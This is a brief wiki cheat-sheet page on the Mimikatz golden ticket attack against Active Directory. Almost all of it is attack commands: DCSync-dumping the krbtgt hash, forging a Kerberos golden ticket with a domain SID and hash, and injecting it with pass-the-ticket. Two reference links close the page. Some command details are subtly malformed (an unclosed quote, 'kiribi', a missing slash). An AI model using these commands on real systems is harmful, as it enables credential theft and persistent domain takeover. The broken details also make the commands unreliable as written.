Mimikatz

From WikiWiki
Jump to navigation Jump to search
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.

golden ticket

#get krbtgt password hash
.\Mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:contoso.int /user:krbtgt exit

mimikatz # kerberos::golden /admin:adminuser /domain:contoso.int /sid:S-1-5-21-0123456789-012345678-0234567890-1112 /krbt
gt:8dd38658f31da2b60103a2856d7fd42a /ticket:myticket.kiribi

kerberos::ptt myticket.kiribi

kerberos::tgt ticket:myadmin-golden.kiribi


https://adsecurity.org/?page_id=1821

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf